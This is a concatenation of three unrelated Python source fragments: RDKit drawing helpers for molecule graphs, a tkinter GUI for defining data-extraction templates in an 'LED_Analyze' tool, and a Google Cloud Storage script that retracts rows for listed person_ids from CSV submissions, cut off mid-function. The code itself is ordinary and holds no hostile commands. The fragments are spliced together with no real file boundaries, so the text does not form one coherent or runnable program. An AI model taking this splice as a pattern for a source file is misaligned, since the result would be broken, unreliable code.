        AllChem.Compute2DCoords(mol)
def get_smiles_strings(graphs):
    """Lazily map each graph to its SMILES string."""
    return map(Chem.MolToSmiles, map(nx_to_rdkit, graphs))
def nx_to_image(graphs, n_graphs_per_line=5, size=250, title_key=None, titles=None):
    """Render a list of graphs to a grid image.

    :param graphs: list of nx.Graph (a bare graph is rejected)
    :param title_key: graph attribute to use as each cell's caption
    :param titles: explicit caption list, used when title_key is falsy
    """
    # we want a list of graphs
    if isinstance(graphs, nx.Graph):
        raise Exception("give me a list of graphs")
    # BUG FIX (py3): materialize the molecules. A lazy `map` would be
    # exhausted by set_coordinates() inside compounds_to_image before
    # Draw.MolsToGridImage iterates it, producing an empty image.
    compounds = [nx_to_rdkit(graph) for graph in graphs]
    # take care of the subtitle of each graph
    if title_key:
        legend = [g.graph.get(title_key, 'N/A') for g in graphs]
    elif titles:
        legend = titles
    else:
        # BUG FIX (py3): Draw expects an indexable sequence, not a map object.
        legend = [str(i) for i in range(len(graphs))]
    return compounds_to_image(compounds, n_graphs_per_line=n_graphs_per_line, size=size, legend=legend)
def compounds_to_image(compounds, n_graphs_per_line=5, size=250, legend=None):
    """Draw a grid image of rdkit molecules.

    Accepts any iterable of molecules and any iterable legend.
    """
    # BUG FIX (py3): materialize both iterables — set_coordinates() would
    # otherwise exhaust a generator/map before Draw iterates it, and
    # MolsToGridImage needs an indexable legend.
    compounds = list(compounds)
    if legend is not None:
        legend = list(legend)
    # calculate coordinates:
    set_coordinates(compounds)
    # make the image
    return Draw.MolsToGridImage(compounds, molsPerRow=n_graphs_per_line, subImgSize=(size, size), legends=legend)
|
"""
LED_Analyze - gui_input_template
Date: 15 June 2018
By: Ivan Pougatchev
Version: 1.0
"""
from tkinter import *
from tkinter import messagebox
from copy import deepcopy
from gui_common import *
from analysis_main import InputTemplate, ExtractVal, ExtractRange
class TemplateScrFrame(SelectableScrFrame):
    """
    Scrolling frame to be placed within InputTemplateFrame. Display
    template data currently contained within data_ref container where
    data_ref is the list of uncommitted input templates.
    """
    def __init__(self, master, data_ref):
        # (label, width-in-px) pairs; the first, unlabeled column holds the
        # row-selection widgets provided by SelectableScrFrame.
        header = (("", 35),
                  ("Input Name", 90),
                  ("File Type", 75),
                  ("Delimiter", 75),
                  ("Suffix", 75),
                  ("Outputs", 100))
        SelectableScrFrame.__init__(self, master, data_ref, header, 125)

    def update_data(self, start=0):
        # Update data contained in the data_lines container with the current
        # data in the data_ref container
        new_data_lines = []
        # Extract data from each template to generate label text
        for template in self.data_ref[start:]:
            new_line = []
            new_line.append(template.name)
            new_line.append(template.file_type)
            new_line.append(template.delim)
            new_line.append(template.suffix)
            # Extract just the names of the values/ranges
            ext_names = []
            for ext_single in template.vals:
                ext_names.append(ext_single.name)
                ext_names.append("\n")
            for ext_range in template.ranges:
                ext_names.append(ext_range.name)
                ext_names.append("\n")
            # Join and drop the trailing newline separator.
            name_str = "".join(ext_names)[:-1]
            new_line.append(name_str)
            new_data_lines.append(new_line)
        # Replace only rows from `start` onward; earlier rows are unchanged.
        del self.data_lines[start:]
        self.data_lines.extend(new_data_lines)

    def add_line(self):
        # Open the template editor dialog for a brand-new template.
        gui = AddTemplateGUI(self.data_ref, self, None)
        gui.lift(self.master)

    def edit_line(self, i):
        # Open the editor pre-populated with template i (no-op when empty).
        if len(self.data_ref) != 0:
            gui = AddTemplateGUI(self.data_ref, self, i)
            gui.lift(self.master)

    def remove_line(self, i):
        # Delete template i, then refresh and re-index the remaining rows.
        if len(self.data_ref) != 0:
            del self.data_ref[i]
            self.update_data(i)
            self.reconcile_lines(i)
class SingleScrFrame(SelectableScrFrame):
    """
    Scrolling frame to be placed within an instance of InputTemplateGUI.
    Display info for single value extractions currently contained
    within data_ref container where data_ref is uncommitted data for a
    single input template.
    """
    def __init__(self, master, data_ref, file_type):
        # (label, width-in-px) pairs for the single-value extraction table.
        columns = (("", 35),
                   ("Value Name", 100),
                   ("Line", 60),
                   ("Sheet", 40),
                   ("Rule/Source", 180))
        SelectableScrFrame.__init__(self, master, data_ref, columns, 150)
        self.file_type = file_type

    def update_data(self):
        # Rebuild the display rows from the template's single-value entries.
        self.data_lines = [
            [val.name, val.line, val.sheet, val.rule]
            for val in self.data_ref.vals
        ]

    def add_line(self):
        # Open the editor dialog for a new single-value extraction.
        dialog = AddSingleValueGUI(self.data_ref, self, self.file_type, None)
        dialog.lift(self.master)

    def edit_line(self, i):
        # Edit extraction i (no-op when there are none).
        if len(self.data_ref.vals) != 0:
            AddSingleValueGUI(self.data_ref, self, self.file_type, i)

    def remove_line(self, i):
        # Delete extraction i, then refresh and re-index remaining rows.
        if len(self.data_ref.vals) != 0:
            del self.data_ref.vals[i]
            self.update_data()
            self.reconcile_lines(i)
class RangeScrFrame(SelectableScrFrame):
    """
    Scrolling frame to be placed within an instance of InputTemplateGUI.
    Display info for range extractions currently contained within data_ref
    container where data_ref is uncommitted data for a single input
    template.
    """
    def __init__(self, master, data_ref, file_type):
        # (label, width-in-px) pairs for the range extraction table.
        columns = (("", 35),
                   ("Range Name", 150),
                   ("Sheet", 50),
                   ("Rule/Source", 180))
        SelectableScrFrame.__init__(self, master, data_ref, columns, 150)
        self.file_type = file_type

    def update_data(self):
        # Rebuild the display rows from the template's range extractions.
        self.data_lines = [
            [rng.name, rng.sheet, rng.rule]
            for rng in self.data_ref.ranges
        ]

    def add_line(self):
        # Open the editor dialog for a new range extraction.
        AddRangeGUI(self.data_ref, self, self.file_type, None)

    def edit_line(self, i):
        # Edit range extraction i (no-op when there are none).
        if len(self.data_ref.ranges) != 0:
            AddRangeGUI(self.data_ref, self, self.file_type, i)

    def remove_line(self, i):
        # Delete range extraction i, then refresh and re-index remaining rows.
        if len(self.data_ref.ranges) != 0:
            del self.data_ref.ranges[i]
            self.update_data()
            self.reconcile_lines(i)
class InputTemplateFrame(LabelFrame):
    """
    Frame to be placed on the main GUI screen containing the
    SelectableScrFrame displaying current input templates
    """
    def __init__(self, master, data_ref, commit_flag):
        LabelFrame.__init__(self, master)
        # Initialize attributes
        self.data_ref = data_ref  # Ref to current committed templates
        # Working copy the user edits; only copied back on commit().
        self.data_uncomm = deepcopy(data_ref)
        self.commit_flag = commit_flag  # shared flag flipped on (un)commit
        # Configure frame
        self.config(text = "Input Template")
        self.columnconfigure(0, minsize=5)
        for i in range(1, 5):
            self.columnconfigure(i, minsize=100)
        self.columnconfigure(5, minsize=5)
        # Create TemplateScrFrame
        self.scrframe = TemplateScrFrame(self, self.data_uncomm)
        self.scrframe.grid(
            row=1, column=1, columnspan=4, pady=2)
        # Create buttons: (label, callback, grid row, grid column)
        button_data = (
            ("Add Template", self.scrframe.add_line, 0, 1),
            ("Edit",
             lambda: self.scrframe.edit_line(self.scrframe.sel_line.get()),
             0, 3),
            ("Remove",
             lambda: self.scrframe.remove_line(self.scrframe.sel_line.get()),
             0, 4),
            ("Commit", self.commit, 2, 3),
            ("Un-Commit", self.ask_uncommit, 2, 4)
        )
        self.buttons = []
        for i, (name, call, r, c) in enumerate(button_data):
            self.buttons.append(
                Button(self,
                       text=name,
                       width=15,
                       command=call)
            )
            self.buttons[i].grid(row=r, column=c, pady=5)
        # Un-Commit starts disabled — presumably re-enabled elsewhere once
        # there is committed data to revert to; confirm.
        self.buttons[4].config(state=DISABLED)

    def ask_uncommit(self):
        # Confirm with the user before discarding dependent analysis data.
        result = messagebox.askokcancel(
            "Confirm Un-Commit",
            "Are you sure you want to un-commit the input " +
            "template data? Doing so will clear out all " +
            "other analysis data.",
            parent=self)
        if result:
            self.uncommit()

    def commit(self):
        # Publish the working copy into the committed container IN PLACE so
        # every other holder of data_ref observes the update.
        data_comm = deepcopy(self.data_uncomm)
        self.data_ref.clear()
        self.data_ref.extend(data_comm)
        self.commit_flag.set(True)

    def uncommit(self):
        # Reset the working copy back to the last committed state.
        self.data_uncomm.clear()
        for template in self.data_ref:
            copy_temp = deepcopy(template)
            self.data_uncomm.append(copy_temp)
        self.commit_flag.set(False)

    def soft_commit(self):
        # Same as commit() but without flipping the commit flag.
        data_comm = deepcopy(self.data_uncomm)
        self.data_ref.clear()
        self.data_ref.extend(data_comm)
class TemplateExtractFrame(LabelFrame):
    """
    Labelled frame hosting the list of single-value or range extractions
    for the template being edited, plus Add/Edit/Remove buttons operating
    on the currently selected line.

    :param data_ref: the uncommitted template data shown in the list
    :param label: "Extract Single Value" or "Extract Range"
    :param file_type: "Delimited Text" or "Spreadsheet"
    """
    def __init__(self, master, data_ref, label, file_type):
        LabelFrame.__init__(self, master)
        self.config(text=label)
        # Initialize attributes
        self.master = master
        self.data_ref = data_ref  # Ref to the uncommitted template data
        # Create the scrollable frame matching the requested extraction kind
        if label == "Extract Single Value":
            self.scrframe = SingleScrFrame(self, self.data_ref, file_type)
        elif label == "Extract Range":
            self.scrframe = RangeScrFrame(self, self.data_ref, file_type)
        else:
            # An unknown label previously left self.scrframe unset and
            # crashed below with AttributeError; fail fast instead.
            raise ValueError(
                "Unknown extraction frame label: {!r}".format(label))
        self.scrframe.grid(
            row=2, column=1, columnspan=4)
        self.rowconfigure(0, minsize=2)
        self.columnconfigure(0, minsize=5)
        for i in range(1, 5):
            self.columnconfigure(i, minsize=100)
        self.columnconfigure(5, minsize=5)
        self.rowconfigure(3, minsize=5)
        # Create buttons: (label, callback, grid row, grid column)
        button_data = (
            ("Add", self.scrframe.add_line, 1, 1),
            ("Edit",
             lambda: self.scrframe.edit_line(self.scrframe.sel_line.get()),
             1, 3),
            ("Remove",
             lambda: self.scrframe.remove_line(self.scrframe.sel_line.get()),
             1, 4)
        )
        self.buttons = []
        for i, (name, call, r, c) in enumerate(button_data):
            self.buttons.append(
                Button(self,
                       text=name,
                       width=13,
                       command=call)
            )
            self.buttons[i].grid(row=r, column=c, pady=5)
class AddTemplateGUI(Toplevel):
    """
    GUI pop up window that allows the user to define an input file template
    including:
        * Template name
        * Template file type (delimited text or excel)
        * Template filename suffix
        * Output data to be extracted (name and rule)

    :param data_ref: list of uncommitted templates to add to or edit
    :param display: display frame that opened this window (refreshed on OK)
    :param i: index of the template being edited, or None to create a new one
    """
    def __init__(self, data_ref, display, i=None):
        # Create and configure base window
        Toplevel.__init__(self)
        self.title("Define Input Data Template - CSV Analyzer")
        self.resizable(False, False)
        self.rowconfigure(0, minsize=5)
        self.columnconfigure(0, minsize=5)
        self.columnconfigure(3, minsize=5)
        # Initialize attributes
        self.data_ref = data_ref  # Ref to the list of uncommitted templates
        self.display = display  # Ref to the display frame that called this GUI
        self.i = i
        if self.i is None:
            # Creating a new template: start empty with sensible defaults.
            self.data_uncomm = InputTemplate()
            self.data_uncomm.file_type = "Delimited Text"
            self.data_uncomm.delim = ","
        else:
            # Editing: work on a copy so closing the window leaves the
            # original template untouched.
            self.data_uncomm = deepcopy(self.data_ref[i])
        # Insert input frames
        self.name_in = TextEntryFrame(
            self,
            "Template Name:",
            225, 95)
        self.name_in.grid(row=1, column=1, sticky=W)
        self.type_in = ComboboxFrame(
            self,
            "File Type:",
            ("Delimited Text", "Spreadsheet"),
            225, 95)
        self.type_in.grid(row=2, column=1, sticky=W)
        self.delim_in = TextEntryFrame(
            self,
            "Delimiter:",
            150, 65)
        self.delim_in.grid(row=2, column=2, sticky=W)
        self.suff_in = TextEntryFrame(
            self,
            "Filename Suffix:",
            225, 95)
        self.suff_in.grid(row=3, column=1, sticky=W)
        # Create "Single Value Extract" and "Range Extract" frames
        self.single_frame = TemplateExtractFrame(
            self,
            self.data_uncomm,
            "Extract Single Value",
            self.data_uncomm.file_type)
        self.single_frame.grid(
            row=4, column=1, columnspan=2, pady=2, sticky=W)
        self.range_frame = TemplateExtractFrame(
            self,
            self.data_uncomm,
            "Extract Range",
            self.data_uncomm.file_type)
        self.range_frame.grid(
            row=5, column=1, columnspan=2, pady=2, sticky=W)
        # Create Buttons
        btn_ok = Button(
            self, text="OK", width=15,
            command=self.commit)
        btn_ok.grid(row=6, column=2, pady=5, sticky=E)
        # Prefill data if editing an existing template
        if i is not None:
            self.name_in.entry_input.set(data_ref[i].name)
            self.type_in.combox_input.set(data_ref[i].file_type)
            self.delim_in.entry_input.set(data_ref[i].delim)
            self.suff_in.entry_input.set(data_ref[i].suffix)
            self.single_frame.scrframe.update_data()
            self.single_frame.scrframe.reconcile_lines()
            self.range_frame.scrframe.update_data()
            self.range_frame.scrframe.reconcile_lines()
        # Wipe data if window closes
        self.protocol("WM_DELETE_WINDOW", self.on_close)
        # Clear extraction values and ranges and enable/disable delimiter
        # entry box on file type change
        self.type_in.combox_input.trace("w", self.type_change)

    def commit(self):
        """Validate the form and write the template back into data_ref."""
        # Move template data in self.data_uncomm to the data container
        # referenced by self.data_ref
        self.data_uncomm.name = self.name_in.entry_input.get()
        self.data_uncomm.file_type = self.type_in.combox_input.get()
        self.data_uncomm.delim = self.delim_in.entry_input.get()
        self.data_uncomm.suffix = self.suff_in.entry_input.get()
        # Show error message if required fields are empty
        if not self.data_uncomm.check():
            # Trailing space added: the two literals previously concatenated
            # into "definition.Template".
            messagebox.showerror(
                "User Input Error",
                "Invalid input given for template definition. " +
                "Template definition must have a name, valid delimiter " +
                "character, and at least one extraction value or range.",
                parent=self)
        elif self.i is None:
            # New template: append and surface it in the display frame.
            self.data_ref.append(self.data_uncomm)
            self.display.update_data(len(self.data_ref) - 1)
            self.display.reconcile_lines(len(self.data_ref) - 1)
            self.destroy()
        else:
            # Edited template: replace in place, preserving its position.
            del self.data_ref[self.i]
            self.data_ref.insert(self.i, self.data_uncomm)
            self.display.update_data(self.i)
            self.display.reconcile_lines(self.i)
            self.destroy()

    def on_close(self):
        """Discard any unsaved extraction values/ranges when closing."""
        self.destroy()
        self.data_uncomm.vals.clear()
        self.data_uncomm.ranges.clear()

    def type_change(self, *args):
        """React to a file-type switch: clear extractions, refresh both
        list frames, and toggle the delimiter entry (which is only
        meaningful for delimited text)."""
        self.data_uncomm.vals.clear()
        self.data_uncomm.ranges.clear()
        self.single_frame.scrframe.update_data()
        self.single_frame.scrframe.reconcile_lines()
        self.range_frame.scrframe.update_data()
        self.range_frame.scrframe.reconcile_lines()
        self.data_uncomm.file_type = self.type_in.combox_input.get()
        self.single_frame.scrframe.file_type = self.type_in.combox_input.get()
        self.range_frame.scrframe.file_type = self.type_in.combox_input.get()
        if self.type_in.combox_input.get() == "Delimited Text":
            self.delim_in.enable()
        else:
            self.delim_in.disable()
class AddSingleValueGUI(Toplevel):
    """
    GUI pop up window that allows the user to specify the value to be
    extracted.

    :param data_ref: the uncommitted template being edited
    :param display: display frame that opened this window (refreshed on Accept)
    :param file_type: "Delimited Text" or "Spreadsheet"
    :param i: index of the value being edited, or None to create a new one
    """
    def __init__(self, data_ref, display, file_type, i=None):
        # Initialize and configure window
        Toplevel.__init__(self)
        self.title("Extract Single Value")
        self.rowconfigure(0, minsize=5)
        self.columnconfigure(0, minsize=5)
        self.columnconfigure(2, minsize=5)
        # Initialize attributes
        self.data_ref = data_ref  # Ref to the uncommitted template
        self.display = display  # Ref to the display frame that called this GUI
        self.i = i
        self.store = ExtractVal("", "Filename", "", "", file_type)
        self.file_type = file_type
        # Create data entry frames
        self.name_in = TextEntryFrame(
            self,
            "Name:",
            250, 75)
        self.name_in.grid(row=1, column=1, sticky=W)
        if file_type == "Delimited Text":
            line_vals = tuple(["Filename"] + list(range(1, 100)))
        else:
            # Single-element tuple; the bare ("---") form was just a string.
            line_vals = ("---",)
        self.line_in = SpboxFrame(
            self,
            "Line:",
            line_vals,
            200, 75)
        self.line_in.grid(row=2, column=1, sticky=W)
        if file_type == "Spreadsheet":
            sheet_vals = tuple(["Filename"] + list(range(0, 100)))
        else:
            sheet_vals = ("---",)
        self.sheet_in = SpboxFrame(
            self,
            "Sheet:",
            sheet_vals,
            200, 75)
        self.sheet_in.grid(row=3, column=1, sticky=W)
        self.rule_in = TextEntryFrame(
            self,
            "Rule/Source:",
            250, 75)
        self.rule_in.grid(row=4, column=1, sticky=W)
        # Prefill data if editing an existing value
        if i is not None:
            self.name_in.entry_input.set(data_ref.vals[i].name)
            self.line_in.spbox_input.set(data_ref.vals[i].line)
            self.sheet_in.spbox_input.set(data_ref.vals[i].sheet)
            self.rule_in.entry_input.set(data_ref.vals[i].rule)
        # Create Add button
        btn_add = Button(
            self,
            text="Accept",
            command=self.commit)
        btn_add.grid(row=5, column=1, pady=5, sticky=E)

    def commit(self):
        """Validate the form and store the value in the template."""
        # Check if name exists in extract values/ranges for current
        # set of uncommitted templates
        # NOTE(review): when editing, the value being edited is part of this
        # scan, so re-saving it under its own name is rejected -- confirm
        # whether that behavior is intended.
        check_name = True
        for template in self.display.master.master.data_ref:
            for obj in (template.vals + template.ranges):
                if self.name_in.entry_input.get() == obj.name:
                    check_name = False
        # Give error for duplicate name
        if not check_name:
            # parent=self added for consistency with AddRangeGUI so the
            # dialog stays attached to this window.
            messagebox.showerror(
                "User Input Error",
                "Name given to value is already in use. Please use " +
                "a different name.",
                parent=self)
        # Perform check for empty input and add data to template
        else:
            self.store.name = self.name_in.entry_input.get()
            self.store.rule = self.rule_in.entry_input.get()
            if self.file_type == "Delimited Text":
                # Keep "Filename" as-is; numeric lines become ints.
                if self.line_in.spbox_input.get() == "Filename":
                    self.store.line = self.line_in.spbox_input.get()
                else:
                    self.store.line = int(self.line_in.spbox_input.get())
                self.store.sheet = self.sheet_in.spbox_input.get()
            if self.file_type == "Spreadsheet":
                if self.sheet_in.spbox_input.get() == "Filename":
                    self.store.sheet = self.sheet_in.spbox_input.get()
                else:
                    self.store.sheet = int(self.sheet_in.spbox_input.get())
            # Show error if there are empty fields
            if not self.store.check():
                messagebox.showerror(
                    "User Input Error",
                    "Value definition requires a valid name and rule/source. " +
                    "Rule/source must be a valid RegEx string for 'Delimited " +
                    "Text' file type or a valid cell reference for " +
                    "'Spreadsheet' file type.",
                    parent=self)
            elif self.i is None:
                # New value: append and highlight it in the display.
                self.data_ref.vals.append(self.store)
                self.display.update_data()
                self.display.reconcile_lines(len(self.data_ref.vals) - 1)
                self.destroy()
            else:
                # Edited value: replace in place, preserving its position.
                del self.data_ref.vals[self.i]
                self.data_ref.vals.insert(self.i, self.store)
                self.display.update_data()
                self.display.reconcile_lines(self.i)
                self.destroy()
class AddRangeGUI(Toplevel):
    """
    GUI pop up window that allows the user to specify the range to be
    extracted.

    :param data_ref: the uncommitted template being edited
    :param display: display frame that opened this window (refreshed on Accept)
    :param file_type: "Delimited Text" or "Spreadsheet"
    :param i: index of the range being edited, or None to create a new one
    """
    def __init__(self, data_ref, display, file_type, i=None):
        # Initialize and configure window
        Toplevel.__init__(self)
        self.title("Extract Range")
        self.rowconfigure(0, minsize=5)
        self.columnconfigure(0, minsize=5)
        self.columnconfigure(2, minsize=5)
        # Initialize attributes
        self.data_ref = data_ref  # Ref to the uncommitted template
        self.display = display  # Ref to the display frame that called this GUI
        self.i = i
        self.store = ExtractRange("", "", "", file_type)
        # Create data entry frames
        self.name_in = TextEntryFrame(
            self,
            "Name:",
            250, 75)
        self.name_in.grid(row=1, column=1, sticky=W)
        if file_type == "Spreadsheet":
            sheet_vals = tuple(range(0, 100))
        else:
            # Single-element tuple; the bare ("---") form was just a string.
            sheet_vals = ("---",)
        self.sheet_in = SpboxFrame(
            self,
            "Sheet:",
            sheet_vals,
            200, 75)
        self.sheet_in.grid(row=2, column=1, sticky=W)
        self.rule_in = TextEntryFrame(
            self,
            "Rule/Source:",
            250, 75)
        self.rule_in.grid(row=3, column=1, sticky=W)
        # Prefill data if editing an existing range
        if i is not None:
            self.name_in.entry_input.set(data_ref.ranges[i].name)
            self.sheet_in.spbox_input.set(data_ref.ranges[i].sheet)
            self.rule_in.entry_input.set(data_ref.ranges[i].rule)
        # Create Add button
        btn_add = Button(
            self,
            text="Accept",
            command=self.commit)
        btn_add.grid(row=4, column=1, pady=5, sticky=E)

    def commit(self):
        """Validate the form and store the range in the template."""
        # Check if name exists in extract values/ranges for current
        # set of uncommitted templates
        # NOTE(review): when editing, the range being edited is part of this
        # scan, so re-saving it under its own name is rejected -- confirm.
        check_name = True
        for template in self.display.master.master.data_ref:
            for obj in (template.vals + template.ranges):
                if self.name_in.entry_input.get() == obj.name:
                    check_name = False
        # Give error for duplicate name
        if not check_name:
            messagebox.showerror(
                "User Input Error",
                "Name given to value is already in use. Please use " +
                "a different name.",
                parent=self)
        # Perform check for empty input and add data to template
        else:
            self.store.name = self.name_in.entry_input.get()
            self.store.rule = self.rule_in.entry_input.get()
            # Keep the "---" placeholder for delimited text; numeric sheet
            # selections are converted to int.
            if self.sheet_in.spbox_input.get() == "---":
                self.store.sheet = self.sheet_in.spbox_input.get()
            else:
                self.store.sheet = int(self.sheet_in.spbox_input.get())
            # Show error if there are empty fields
            if not self.store.check():
                messagebox.showerror(
                    "User Input Error",
                    "Range definition requires a valid name and rule/source. " +
                    "Rule/source must be string of the form '#,#,#,#' for "+
                    "'Delimited Text' file type or a valid range reference for " +
                    "'Spreadsheet' file type.",
                    parent=self)
            elif self.i is None:
                # New range: append and highlight it in the display.
                self.data_ref.ranges.append(self.store)
                self.display.update_data()
                self.display.reconcile_lines(len(self.data_ref.ranges) - 1)
                self.destroy()
            else:
                # Edited range: replace in place, preserving its position.
                del self.data_ref.ranges[self.i]
                self.data_ref.ranges.insert(self.i, self.store)
                self.display.update_data()
                self.display.reconcile_lines(self.i)
                self.destroy()
#!/usr/bin/env python
"""
This script retracts rows for specified pids from the site's submissions located in the archive
The pids must be specified via a pid table containing a person_id and research_id
The pid table must be located in the sandbox_dataset
The schema for the pid table is located in retract_data_bq.py as PID_TABLE_FIELDS
If the submission folder is set to 'all_folders', all the submissions from the site will be considered for retraction
If a submission folder is specified, only that folder will be considered for retraction
"""
import os
from io import BytesIO
import argparse
import logging
from google.cloud import storage, bigquery
import common
from utils import pipeline_logging, gcs
# Query returning every person_id listed in the sandbox pid lookup table.
EXTRACT_PIDS_QUERY = """
SELECT person_id
FROM `{project_id}.{sandbox_dataset_id}.{pid_table_id}`
"""

# CDM/PII tables whose FIRST CSV column holds the person_id.
PID_IN_COL1 = [common.PERSON, common.DEATH] + common.PII_TABLES
# CDM tables whose SECOND CSV column holds the person_id.
PID_IN_COL2 = [
    common.VISIT_OCCURRENCE, common.CONDITION_OCCURRENCE, common.DRUG_EXPOSURE,
    common.MEASUREMENT, common.PROCEDURE_OCCURRENCE, common.OBSERVATION,
    common.DEVICE_EXPOSURE, common.SPECIMEN, common.NOTE
]
def run_gcs_retraction(project_id,
                       sandbox_dataset_id,
                       pid_table_id,
                       hpo_id,
                       folder,
                       force_flag,
                       bucket=None,
                       site_bucket=None):
    """
    Retract from a folder/folders in a GCS bucket all records associated with a pid

    :param project_id: project containing the sandbox dataset
    :param sandbox_dataset_id: dataset containing the pid_table
    :param pid_table_id: table containing the person_ids whose data needs to be retracted
    :param hpo_id: hpo_id of the site to run retraction on; 'none' skips
        bucket retraction entirely
    :param folder: the site's submission folder; if set to 'all_folders', retract from all folders by the site
        if set to 'none', skip retraction from bucket folders
    :param force_flag: if False then prompt for each file
    :param bucket: DRC bucket maintained by curation; defaults to the
        DRC_BUCKET_NAME environment variable when not given
    :param site_bucket: Site's bucket name; defaults to the
        BUCKET_NAME_<HPO_ID> environment variable when not given
    """
    # extract the pids
    pids = extract_pids_from_table(project_id, sandbox_dataset_id, pid_table_id)
    if not bucket:
        bucket = os.environ.get('DRC_BUCKET_NAME')
    gcs_client = storage.Client(project_id)
    logging.info(f'Retracting from bucket {bucket}')
    if hpo_id == 'none':
        logging.info('"RETRACTION_HPO_ID" set to "none", skipping retraction')
        full_bucket_path = ''
        folder_prefixes = []
    else:
        if not site_bucket:
            site_bucket = os.environ.get(f'BUCKET_NAME_{hpo_id.upper()}')
        full_bucket_path = bucket + '/' + hpo_id + '/' + site_bucket
        prefix = f'{hpo_id}/{site_bucket}/'
        # retract from latest folders first
        folder_prefixes = gcs.list_sub_prefixes(gcs_client, bucket, prefix)
        folder_prefixes.sort(reverse=True)
    if folder == 'all_folders':
        to_process_folder_list = folder_prefixes
    elif folder == 'none':
        logging.info(
            '"RETRACTION_SUBMISSION_FOLDER" set to "none", skipping retraction')
        to_process_folder_list = []
    else:
        # Normalize the requested folder so it always ends with '/'.
        # NOTE(review): folder_path is built on full_bucket_path (which
        # includes the bucket name) while folder_prefixes come from
        # list_sub_prefixes(bucket, prefix) -- confirm both use the same
        # format, otherwise this membership test can never match.
        folder_path = full_bucket_path + '/' + folder if folder[
            -1] == '/' else full_bucket_path + '/' + folder + '/'
        if folder_path in folder_prefixes:
            to_process_folder_list = [folder_path]
        else:
            logging.info(
                f'Folder {folder} does not exist in {full_bucket_path}. Exiting'
            )
            return
    logging.info("Retracting data from the following folders:")
    logging.info([
        bucket + '/' + folder_prefix for folder_prefix in to_process_folder_list
    ])
    for folder_prefix in to_process_folder_list:
        logging.info(f'Processing gs://{bucket}/{folder_prefix}')
        # separate cdm from the unknown (unexpected) files
        bucket_item_objs = gcs_client.list_blobs(bucket,
                                                 prefix=folder_prefix,
                                                 delimiter='/')
        folder_items = [blob.name for blob in bucket_item_objs]
        found_files = []
        file_names = [item.split('/')[-1] for item in folder_items]
        for item in file_names:
            # Only retract from CDM or PII files containing PIDs
            item = item.lower()
            table_name = item.split('.')[0]
            if table_name in PID_IN_COL1 + PID_IN_COL2:
                found_files.append(item)
        logging.info('Found the following files to retract data from:')
        logging.info([
            bucket + '/' + folder_prefix + file_name
            for file_name in found_files
        ])
        logging.info("Proceed?")
        if force_flag:
            logging.info(
                f"Attempting to force retract for folder {folder_prefix} in bucket {bucket}"
            )
            response = "Y"
        else:
            # Make sure user types Y to proceed
            response = get_response()
        if response == "Y":
            retract(gcs_client, pids, bucket, found_files, folder_prefix,
                    force_flag)
            logging.info(
                f"Retraction completed for folder {bucket}/{folder_prefix}")
        elif response.lower() == "n":
            logging.info(f"Skipping folder {folder_prefix}")
    logging.info("Retraction from GCS complete")
    return
def retract(gcs_client, pids, bucket, found_files, folder_prefix, force_flag):
    """
    Retract from a folder in a GCS bucket all records associated with a pid

    pid table must follow schema described in retract_data_bq.PID_TABLE_FIELDS and must reside in sandbox_dataset_id
    This function removes lines from all files containing person_ids if they exist in pid_table_id
    Throws SyntaxError/TypeError/ValueError if non-ints are found

    :param gcs_client: google cloud storage client
    :param pids: person_ids to retract
    :param bucket: bucket containing records to retract
    :param found_files: files found in the current folder
    :param folder_prefix: current folder being processed
    :param force_flag: if False then prompt for each file
    """
    for file_name in found_files:
        # File name (minus extension) tells us which column holds person_id.
        table_name = file_name.split(".")[0]
        lines_removed = 0
        file_gcs_path = f'{bucket}/{folder_prefix}{file_name}'
        if force_flag:
            logging.info(f"Downloading file in path {file_gcs_path}")
            response = "Y"
        else:
            # Make sure user types Y to proceed
            logging.info(
                f"Are you sure you want to retract rows for person_ids {pids} from path {file_gcs_path}?"
            )
            response = get_response()
        if response == "Y":
            # Output and input file content initialization
            retracted_file_string = BytesIO()
            gcs_bucket = gcs_client.bucket(bucket)
            blob = gcs_bucket.blob(folder_prefix + file_name)
            # Entire file is loaded into memory and split on newlines.
            input_file_lines = blob.download_as_string().split(b'\n')
            if len(input_file_lines) < 2:
                # Header only (or empty file): nothing to retract.
                continue
            input_header = input_file_lines[0]
            input_contents = input_file_lines[1:]
            retracted_file_string.write(input_header + b'\n')
            logging.info(
                f"Checking for person_ids {pids} in path {file_gcs_path}")
            # Check if file has person_id in first or second column
            # NOTE(review): the naive split on b',' assumes no field
            # contains an embedded comma inside quotes -- confirm for this
            # data before relying on it.
            for input_line in input_contents:
                input_line = input_line.strip()
                # ensure line is not empty
                if input_line:
                    cols = input_line.split(b',')
                    # ensure at least two columns exist
                    if len(cols) > 1:
                        # Strip surrounding quotes before int parsing.
                        col_1 = cols[0].replace(b'"', b'')
                        col_2 = cols[1].replace(b'"', b'')
                        # skip if non-integer is encountered and keep the line as is
                        try:
                            if ((table_name in PID_IN_COL1 and
                                 int(col_1) in pids) or
                                    (table_name in PID_IN_COL2 and
                                     int(col_2) in pids)):
                                # do not write back this line since it contains a pid to retract
                                # increment removed lines counter
                                lines_removed += 1
                            else:
                                # pid not found, retain this line
                                retracted_file_string.write(input_line + b'\n')
                        except ValueError:
                            # write back non-num lines
                            retracted_file_string.write(input_line + b'\n')
                    else:
                        # write back ill-formed lines. Note: These lines do not make it into BigQuery
                        retracted_file_string.write(input_line + b'\n')
            # Write result back to bucket, only if something was removed.
            if lines_removed > 0:
                logging.info(
                    f"{lines_removed} rows retracted from {file_gcs_path}")
                logging.info(f"Uploading to overwrite...")
                new_blob = gcs_bucket.blob(folder_prefix + file_name)
                new_blob.upload_from_file(retracted_file_string,
                                          rewind=True,
                                          content_type='text/csv')
                logging.info(f"Retraction successful for file {file_gcs_path}")
            else:
                logging.info(
                    f"Not updating file {file_gcs_path} since pids {pids} not found"
                )
        elif response.lower() == "n":
            logging.info(f"Skipping file {file_gcs_path}")
    return
# Make sure user types Y to proceed
def get_response():
    """Prompt until the user answers 'Y', 'n' or 'N'; return that answer."""
    prompt_text = 'Please press Y/n\n'
    while True:
        answer = input(prompt_text)
        if answer in ('Y', 'n', 'N'):
            return answer
def extract_pids_from_table(project_id, sandbox_dataset_id, pid_table_id):
    """
    Extracts person_ids from table in BQ in the form of a set of integers

    :param project_id: project containing the sandbox dataset with pid table
    :param sandbox_dataset_id: dataset containing the pid table
    :param pid_table_id: identifies the table containing the person_ids to retract
    :return: set of integer pids
    """
    q = EXTRACT_PIDS_QUERY.format(project_id=project_id,
                                  sandbox_dataset_id=sandbox_dataset_id,
                                  pid_table_id=pid_table_id)
    client = bigquery.Client(project_id)
    job = client.query(q)
    # Return a set (as the docstring promises); this also makes the frequent
